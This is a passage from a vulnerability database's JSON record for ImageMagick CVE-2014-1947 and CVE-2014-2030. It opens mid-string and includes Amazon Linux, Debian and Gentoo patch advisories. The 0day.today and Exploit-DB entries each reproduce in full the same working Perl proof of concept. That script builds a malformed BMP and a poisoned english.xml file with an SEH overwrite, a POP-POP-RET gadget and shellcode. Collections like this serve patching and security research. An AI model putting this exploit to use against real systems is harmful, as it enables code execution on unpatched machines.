$junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer\r\nmy $fill = "\\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk\r\n$sploit = $sploit.$fill; # assemble the final buffer\r\n \r\n# build the malicious xml file\r\nmy $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">'; \r\n$xml = $xml . $sploit;\r\n$xml = $xml . '</message></warning></image></corrupt></exception></locale>';\r\nmy $buffer = $xml;\r\nwrite_file("english.xml", $buffer);\n ", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-61456"}], "zdt": [{"lastseen": "2018-04-13T05:47:21", "bulletinFamily": "exploit", "description": "I saw the notice for this CVE today but there was no known published expoits so \r# I figured I'd put together this quick POC. Note, all app modules for the tested \r# version were compiled with safeSEH so my use of an OS module may require adjustment \r# of the offsets. There also appears to be several bad chars that fail the sploit.\r# For this POC I only generate a basic messagebox using FatalAppExit(). It may take \r# some work to get it to do more.#### Usage Info\nThis particular BOF takes advantage of insecure handling of the english.xml file\r# which the app uses to display various error messages. I didn't spend much time \r# investigating the app so there may be additional vulnerable locations\r# \r# This script generates two files:\r# 1) a malfored .bmp file that will cause ImageMagick to generate a specific\r# error when opened (LengthAndFilesizeDoNotMatch), as defined in the \r# english.xml file\r# 2) a modified english.xml file that replaces the original error message with \r# our exploit code\r#\r# To test this POC:\r# 1) run the script, replace the original english.xml file (in App's folder)\r# 2) open the .bmp file with ImageMagick", "modified": "2014-02-17T00:00:00", "published": "2014-02-17T00:00:00", "id": "1337DAY-ID-21901", "href": "https://0day.today/exploit/description/21901", "type": "zdt", "title": "ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)", "sourceData": "sub write_file { \r\n my ($file, $buffer) = @_;\r\n open(FILE, \">$file\");\r\n print FILE $buffer;\r\n close(FILE);\r\n print \"Exploit file [\" . $file . \"] created\\n\";\r\n print \"Buffer size: \" . length($buffer) . \"\\n\"; \r\n}\r\n \r\n# create bmp file header; needs to be a valid header to generate necessary error\r\nsub bmp_header {\r\n my $header = \"\\x42\\x4d\"; # BM\r\n $header = $header . \"\\x46\\x00\\x00\\x00\"; # file size (70 bytes)\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # unused \r\n $header = $header . \"\\x36\\x00\\x00\\x00\"; # bitmap offset\r\n $header = $header . \"\\x28\\x00\\x00\\x00\"; # header size\r\n $header = $header . \"\\x02\\x00\\x00\\x00\"; # width\r\n $header = $header . \"\\x02\\x00\\x00\\x00\"; # height\r\n $header = $header . \"\\x01\\x00\"; # num of color planes\r\n $header = $header . \"\\x18\\x00\"; # num of bits per pixel\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # compression (none)\r\n $header = $header . \"\\x10\\x00\\x00\\x00\"; # image size\r\n $header = $header . \"\\x13\\x0b\\x00\\x00\"; # horizontal resolution (2,835 pixels/meter)\r\n $header = $header . \"\\x13\\x0b\\x00\\x00\"; # vertical resolution (2,835 pixels/meter)\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # colors in palette\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; #important colors\r\n return $header;\r\n}\r\n \r\n## Construct the corrupted bmp file which will trigger the vuln\r\nmy $header = bmp_header();\r\nmy $data = \"\\x41\" x (5000 - length($header)); # arbitrary file data filler\r\nmy $buffer = $header.$data; \r\nwrite_file(\"corrupt.bmp\", $buffer);\r\n \r\n# construct the buffer payload for our xml file\r\nmy $buffsize = 100000;\r\nmy $junk = \"\\x41\" x 62504; # offset to next seh at 568\r\nmy $nseh = \"\\xeb\\x32\\x90\\x90\"; # overwrite next seh with jmp instruction (20 bytes)\r\nmy $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret\r\n # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\\WINDOWS\\system32\\OLEACC.dll)\r\nmy $junk2 = \"\\x41\" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button \r\nmy $nops = \"\\x90\" x 100;\r\n \r\n# this is just a POC shellcode that displays a messagebox using the FatalAppExit function \r\nmy $shell = \"\\xb9\\x7c\\xec\\xa5\\x7c\" . # Unicode String \"FailSilently\" (address may vary)\r\n \"\\x31\\xc0\" . # xor eax, eax\r\n \"\\xbb\\xb2\\x1b\\x86\\x7c\" . # kernel32.dll FatalAppExit()\r\n \"\\x51\" . # push ecx\r\n \"\\x50\" . # push eax\r\n \"\\xff\\xd3\"; # call ebx\r\n \r\nmy $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer\r\nmy $fill = \"\\x43\" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk\r\n$sploit = $sploit.$fill; # assemble the final buffer\r\n \r\n# build the malicious xml file\r\nmy $xml = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><locale name=\"english\"><exception><corrupt><image><warning><message name=\"LengthAndFilesizeDoNotMatch\">'; \r\n$xml = $xml . $sploit;\r\n$xml = $xml . '</message></warning></image></corrupt></exception></locale>';\r\nmy $buffer = $xml;\r\nwrite_file(\"english.xml\", $buffer);\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21901"}], "amazon": [{"lastseen": "2018-10-02T16:55:26", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA buffer overflow flaw affecting ImageMagick and GraphicsMagic when handling PSD images was reported.\n\n \n**Affected Packages:** \n\n\nGraphicsMagick\n\n \n**Issue Correction:** \nRun _yum update GraphicsMagick_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.i686 \n GraphicsMagick-1.3.20-3.5.amzn1.i686 \n GraphicsMagick-devel-1.3.20-3.5.amzn1.i686 \n GraphicsMagick-c++-1.3.20-3.5.amzn1.i686 \n GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.i686 \n GraphicsMagick-perl-1.3.20-3.5.amzn1.i686 \n \n noarch: \n GraphicsMagick-doc-1.3.20-3.5.amzn1.noarch \n \n src: \n GraphicsMagick-1.3.20-3.5.amzn1.src \n \n x86_64: \n GraphicsMagick-devel-1.3.20-3.5.amzn1.x86_64 \n GraphicsMagick-c++-1.3.20-3.5.amzn1.x86_64 \n GraphicsMagick-1.3.20-3.5.amzn1.x86_64 \n GraphicsMagick-c++-devel-1.3.20-3.5.amzn1.x86_64 \n GraphicsMagick-perl-1.3.20-3.5.amzn1.x86_64 \n GraphicsMagick-debuginfo-1.3.20-3.5.amzn1.x86_64 \n \n \n", "modified": "2014-10-01T18:51:00", "published": "2014-10-01T18:51:00", "id": "ALAS-2014-420", "href": "https://alas.aws.amazon.com/ALAS-2014-420.html", "title": "Medium: GraphicsMagick", "type": "amazon", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-02T16:55:03", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA buffer overflow flaw was found in the way ImageMagick handled PSD images that use RLE encoding. An attacker could create a malicious PSD image file that, when opened in ImageMagick, would cause ImageMagick to crash or, potentially, execute arbitrary code with the privileges of the user running ImageMagick.\n\nA buffer overflow flaw affecting ImageMagick when creating PSD images was reported. The vulnerability is similar to [CVE-2014-1947 __](<https://access.redhat.com/security/cve/CVE-2014-1947>), except that [CVE-2014-2030 __](<https://access.redhat.com/security/cve/CVE-2014-2030>)'s format string is \"L%06ld\" instead of [CVE-2014-1947 __](<https://access.redhat.com/security/cve/CVE-2014-1947>)'s \"L%02ld\" due to [commit r1448](< http://trac.imagemagick.org/changeset/1448>).\n\n \n**Affected Packages:** \n\n\nImageMagick\n\n \n**Issue Correction:** \nRun _yum update ImageMagick_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n ImageMagick-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-devel-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-doc-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-c++-6.7.8.9-10.15.amzn1.i686 \n ImageMagick-perl-6.7.8.9-10.15.amzn1.i686 \n \n src: \n ImageMagick-6.7.8.9-10.15.amzn1.src \n \n x86_64: \n ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-devel-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-perl-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-doc-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-c++-6.7.8.9-10.15.amzn1.x86_64 \n ImageMagick-6.7.8.9-10.15.amzn1.x86_64 \n \n \n", "modified": "2014-09-18T00:34:00", "published": "2014-09-18T00:34:00", "id": "ALAS-2014-336", "href": "https://alas.aws.amazon.com/ALAS-2014-336.html", "title": "Medium: ImageMagick", "type": "amazon", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-02-03T15:14:36", "bulletinFamily": "exploit", "description": "ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH). CVE-2014-1947,CVE-2014-2030. Local exploit for windows platform", "modified": "2014-02-16T00:00:00", "published": "2014-02-16T00:00:00", "id": "EDB-ID:31688", "href": "https://www.exploit-db.com/exploits/31688/", "type": "exploitdb", "title": "ImageMagick 6.8.8-4 - Local Buffer Overflow SEH", "sourceData": "#!/usr/bin/perl\r\n########################################################################################\r\n# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)\r\n# Date: 2-13-2014\r\n# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift\r\n# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)\r\n# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/\r\n# Version Tested: 6.8.8-4\r\n# Tested On: Windows XP SP3\r\n########################################################################################\r\n# Credits:\r\n# \r\n# CVE-2014-1947 published Feb 08 2014\r\n# by Justin Grant\r\n# http://www.securityfocus.com/bid/65478/info\r\n#\r\n########################################################################################\r\n# Overview:\r\n#\r\n# I saw the notice for this CVE today but there was no known published expoits so \r\n# I figured I'd put together this quick POC. Note, all app modules for the tested \r\n# version were compiled with safeSEH so my use of an OS module may require adjustment \r\n# of the offsets. There also appears to be several bad chars that fail the sploit.\r\n# For this POC I only generate a basic messagebox using FatalAppExit(). It may take \r\n# some work to get it to do more.\r\n#\r\n# How it works:\r\n# \r\n# This particular BOF takes advantage of insecure handling of the english.xml file\r\n# which the app uses to display various error messages. I didn't spend much time \r\n# investigating the app so there may be additional vulnerable locations\r\n# \r\n# This script generates two files:\r\n# 1) a malfored .bmp file that will cause ImageMagick to generate a specific\r\n# error when opened (LengthAndFilesizeDoNotMatch), as defined in the \r\n# english.xml file\r\n# 2) a modified english.xml file that replaces the original error message with \r\n# our exploit code\r\n#\r\n# To test this POC:\r\n# 1) run the script, replace the original english.xml file (in App's folder)\r\n# 2) open the .bmp file with ImageMagick\r\n########################################################################################\r\n\r\n# file write function \r\nsub write_file { \r\n my ($file, $buffer) = @_;\r\n open(FILE, \">$file\");\r\n print FILE $buffer;\r\n close(FILE);\r\n print \"Exploit file [\" . $file . \"] created\\n\";\r\n print \"Buffer size: \" . length($buffer) . \"\\n\"; \r\n}\r\n\r\n# create bmp file header; needs to be a valid header to generate necessary error\r\nsub bmp_header {\r\n my $header = \"\\x42\\x4d\"; # BM\r\n $header = $header . \"\\x46\\x00\\x00\\x00\"; # file size (70 bytes)\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # unused \r\n $header = $header . \"\\x36\\x00\\x00\\x00\"; # bitmap offset\r\n $header = $header . \"\\x28\\x00\\x00\\x00\"; # header size\r\n $header = $header . \"\\x02\\x00\\x00\\x00\"; # width\r\n $header = $header . \"\\x02\\x00\\x00\\x00\"; # height\r\n $header = $header . \"\\x01\\x00\"; # num of color planes\r\n $header = $header . \"\\x18\\x00\"; # num of bits per pixel\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # compression (none)\r\n $header = $header . \"\\x10\\x00\\x00\\x00\"; # image size\r\n $header = $header . \"\\x13\\x0b\\x00\\x00\"; # horizontal resolution (2,835 pixels/meter)\r\n $header = $header . \"\\x13\\x0b\\x00\\x00\"; # vertical resolution (2,835 pixels/meter)\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; # colors in palette\r\n $header = $header . \"\\x00\\x00\\x00\\x00\"; #important colors\r\n return $header;\r\n}\r\n\r\n## Construct the corrupted bmp file which will trigger the vuln\r\nmy $header = bmp_header();\r\nmy $data = \"\\x41\" x (5000 - length($header)); # arbitrary file data filler\r\nmy $buffer = $header.$data; \r\nwrite_file(\"corrupt.bmp\", $buffer);\r\n\r\n# construct the buffer payload for our xml file\r\nmy $buffsize = 100000;\r\nmy $junk = \"\\x41\" x 62504; # offset to next seh at 568\r\nmy $nseh = \"\\xeb\\x32\\x90\\x90\"; # overwrite next seh with jmp instruction (20 bytes)\r\nmy $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret\r\n\t\t\t\t # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\\WINDOWS\\system32\\OLEACC.dll)\r\nmy $junk2 = \"\\x41\" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button \r\nmy $nops = \"\\x90\" x 100;\r\n\r\n# this is just a POC shellcode that displays a messagebox using the FatalAppExit function \r\nmy $shell = \"\\xb9\\x7c\\xec\\xa5\\x7c\" . # Unicode String \"FailSilently\" (address may vary)\r\n\t \"\\x31\\xc0\" . # xor eax, eax\r\n\t \"\\xbb\\xb2\\x1b\\x86\\x7c\" . # kernel32.dll FatalAppExit()\r\n\t \"\\x51\" . # push ecx\r\n\t \"\\x50\" . # push eax\r\n\t \"\\xff\\xd3\"; # call ebx\r\n\r\nmy $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer\r\nmy $fill = \"\\x43\" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk\r\n$sploit = $sploit.$fill; # assemble the final buffer\r\n\r\n# build the malicious xml file\r\nmy $xml = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><locale name=\"english\"><exception><corrupt><image><warning><message name=\"LengthAndFilesizeDoNotMatch\">'; \r\n$xml = $xml . $sploit;\r\n$xml = $xml . '</message></warning></image></corrupt></exception></locale>';\r\nmy $buffer = $xml;\r\nwrite_file(\"english.xml\", $buffer); \r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/31688/"}], "debian": [{"lastseen": "2018-10-18T13:50:18", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2897-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 09, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2014-1947 CVE-2014-1958 CVE-2014-2030\n\nSeveral buffer overflows were found in Imagemagick, a suite of image \nmanipulation programs. Processing malformed PSD files could lead to the \nexecution of arbitrary code.\n\nFor the oldstable distribution (squeeze), these problems have been fixed\nin version 8:6.6.0.4-3+squeeze4.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 8:6.7.7.10-5+deb7u3.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 8:6.7.7.10+dfsg-1.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-04-09T17:12:19", "published": "2014-04-09T17:12:19", "id": "DEBIAN:DSA-2898-1:75ACF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00074.html", "title": "[SECURITY] [DSA 2898-1] imagemagick security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:20", "bulletinFamily": "unix", "description": "### Background\n\nImageMagick is a collection of tools and libraries for manipulating various image formats. \n\n### Description\n\nMultiple vulnerabilities have been discovered in ImageMagick. Please review the CVE identifiers referenced below for details. \n\nNote that CVE-2012-1185 and CVE-2012-1186 were issued due to incomplete fixes for CVE-2012-0247 and CVE-2012-0248, respectively. The earlier CVEs were addressed in GLSA 201203-09. \n\n### Impact\n\nA remote attacker can utilize multiple vectors to execute arbitrary code or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ImageMagick users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-gfx/imagemagick-6.8.8.10\"", "modified": "2014-05-17T00:00:00", "published": "2014-05-17T00:00:00", "id": "GLSA-201405-09", "href": "https://security.gentoo.org/glsa/201405-09", "type": "gentoo", "title": "ImageMagick: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}